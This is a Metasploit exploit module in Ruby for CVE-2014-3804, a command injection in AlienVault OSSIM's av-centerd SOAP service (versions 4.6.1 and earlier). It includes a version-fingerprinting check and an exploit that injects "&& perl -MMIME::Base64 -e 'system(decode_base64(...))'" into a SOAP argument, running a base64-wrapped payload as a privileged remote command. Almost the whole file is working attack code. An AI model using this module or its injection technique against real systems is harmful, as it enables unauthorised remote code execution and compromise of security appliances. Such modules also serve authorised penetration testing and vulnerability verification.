Path: blob/master/modules/exploits/linux/ids/alienvault_centerd_soap_exec.rb
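##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'rexml/document'

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include REXML

  # First release in which the av-centerd command injection is fixed; every
  # release below this is treated as affected by #check.
  FIXED_VERSION = Gem::Version.new('4.7.0')

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'AlienVault OSSIM av-centerd Command Injection',
        'Description' => %q{
          This module exploits a code execution flaw in AlienVault 4.6.1 and
          prior. The vulnerability exists in the av-centerd SOAP web service,
          where the update_system_info_debian_package method uses perl backticks
          in an insecure way, allowing command injection. This module has been
          tested successfully on AlienVault 4.6.0.
        },
        'Author' => [
          'Unknown', # From HP ZDI team, Vulnerability discovery
          'juan vazquez' # Metasploit module
        ],
        'License' => MSF_LICENSE,
        'References' => [
          ['CVE', '2014-3804'],
          ['BID', '67999'],
          ['ZDI', '14-202'],
          ['URL', 'http://forums.alienvault.com/discussion/2690']
        ],
        'Privileged' => true,
        'Platform' => 'unix',
        'Arch' => ARCH_CMD,
        'Payload' => {
          # 'BadChars' => "[;`$<>|]", # Not applied: the perl stub in
          # build_soap_request base64-wraps the payload, so these never
          # reach the shell directly.
          'Compat' => {
            'RequiredCmd' => 'perl netcat-e openssl python gawk'
          }
        },
        'DefaultOptions' => {
          'SSL' => true
        },
        'Targets' => [
          [ 'AlienVault <= 4.6.1', {}]
        ],
        'DefaultTarget' => 0,
        'DisclosureDate' => '2014-05-05',
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          # Every request is a POST to /av-centerd with a SOAPAction header
          # naming the invoked method, so this activity is visible in the
          # service's request logs.
          'SideEffects' => [IOC_IN_LOGS],
          'Reliability' => [REPEATABLE_SESSION]
        }
      )
    )

    register_options(
      [
        Opt::RPORT(40007)
      ]
    )
  end

  # Fingerprints av-centerd through the read-only 'get_dpkg' method and
  # classifies the host by the alienvault-center package version it reports.
  #
  # @return [Msf::Exploit::CheckCode] Unknown when no response arrives, Safe
  #   when no version is found or the version is >= FIXED_VERSION, Detected
  #   when a version string is present but unparseable, Appears otherwise.
  def check
    res = send_soap_request('get_dpkg')

    return CheckCode::Unknown('Connection failed') unless res

    version = extract_version(res)
    return CheckCode::Safe if version.blank?

    # Version strings must not be compared lexically: as plain strings
    # '4.10.0' < '4.7.0', which would report a patched host as vulnerable.
    unless Gem::Version.correct?(version)
      return CheckCode::Detected("AlienVault version string '#{version}' could not be parsed")
    end

    if Gem::Version.new(version) >= FIXED_VERSION
      return CheckCode::Safe("AlienVault version #{version} is not vulnerable")
    end

    CheckCode::Appears("AlienVault version #{version} appears vulnerable")
  end

  # Extracts the alienvault-center package version from a 'get_dpkg' response.
  #
  # @param res [Rex::Proto::Http::Response] response to the get_dpkg request
  # @return [String, nil] the captured version digits/dots, or nil when the
  #   response is not a 200 from a SOAP::Lite server or the package line is
  #   absent
  def extract_version(res)
    return nil unless res.code == 200
    return nil unless res.headers['SOAPServer'].to_s =~ /SOAP::Lite/

    match = res.body.to_s.match(/alienvault-center\s*([\d.]*)-\d/)
    match && match[1]
  end

  # Sends the update_system_info_debian_package request carrying the payload.
  # The 1-second timeout is deliberately short; presumably the response is
  # not needed once the command has been injected (TODO confirm).
  def exploit
    send_soap_request('update_system_info_debian_package', 1)
  end

  # Builds the SOAP 1.1 envelope for an 'AV/CC/Util' method call.
  #
  # Four random string arguments (c-gensym3..9) are always added. For
  # update_system_info_debian_package a fifth argument (c-gensym11) is
  # appended whose text starts with random letters followed by
  # " && perl -MMIME::Base64 -e '...'"; that trailing fragment is the
  # log-visible indicator of this module (see IOC_IN_LOGS above).
  #
  # @param method [String] name of the remote method to invoke
  # @return [String] the serialized XML document
  def build_soap_request(method)
    xml = Document.new
    xml.add_element(
      'soap:Envelope',
      {
        'xmlns:xsi' => 'http://www.w3.org/2001/XMLSchema-instance',
        'xmlns:soapenc' => 'http://schemas.xmlsoap.org/soap/encoding/',
        'xmlns:xsd' => 'http://www.w3.org/2001/XMLSchema',
        'soap:encodingStyle' => 'http://schemas.xmlsoap.org/soap/encoding/',
        'xmlns:soap' => 'http://schemas.xmlsoap.org/soap/envelope/'
      }
    )
    body = xml.root.add_element('soap:Body')
    m = body.add_element(
      method,
      {
        'xmlns' => 'AV/CC/Util'
      }
    )
    # Argument element names follow the c-gensymN pattern; presumably this
    # mirrors what the SOAP::Lite client itself generates (TODO confirm).
    args = []
    args[0] = m.add_element('c-gensym3', { 'xsi:type' => 'xsd:string' })
    args[1] = m.add_element('c-gensym5', { 'xsi:type' => 'xsd:string' })
    args[2] = m.add_element('c-gensym7', { 'xsi:type' => 'xsd:string' })
    args[3] = m.add_element('c-gensym9', { 'xsi:type' => 'xsd:string' })
    (0..3).each { |i| args[i].text = rand_text_alpha(4..7) }

    if method == 'update_system_info_debian_package'
      args[4] = m.add_element('c-gensym11', { 'xsi:type' => 'xsd:string' })
      # The payload is base64-wrapped and decoded by a perl one-liner so that
      # none of the payload's own characters appear in the injected string.
      perl_payload = 'system(decode_base64'
      perl_payload += "(\"#{Rex::Text.encode_base64(payload.encoded)}\"))"
      args[4].text = rand_text_alpha(4..7).to_s
      args[4].text += " && perl -MMIME::Base64 -e '#{perl_payload}'"
    end

    xml.to_s
  end

  # POSTs a SOAP request for `method` to /av-centerd.
  #
  # @param method [String] remote method name; also placed in the SOAPAction
  #   header as "AV/CC/Util#<method>"
  # @param timeout [Integer] seconds to wait for the response
  # @return [Rex::Proto::Http::Response, nil] the response, or nil on
  #   connection failure (as returned by send_request_cgi)
  def send_soap_request(method, timeout = 20)
    soap = build_soap_request(method)

    send_request_cgi({
      'uri' => '/av-centerd',
      'method' => 'POST',
      'ctype' => 'text/xml; charset=UTF-8',
      'data' => soap,
      'headers' => {
        'SOAPAction' => "\"AV/CC/Util##{method}\""
      }
    }, timeout)
  end
end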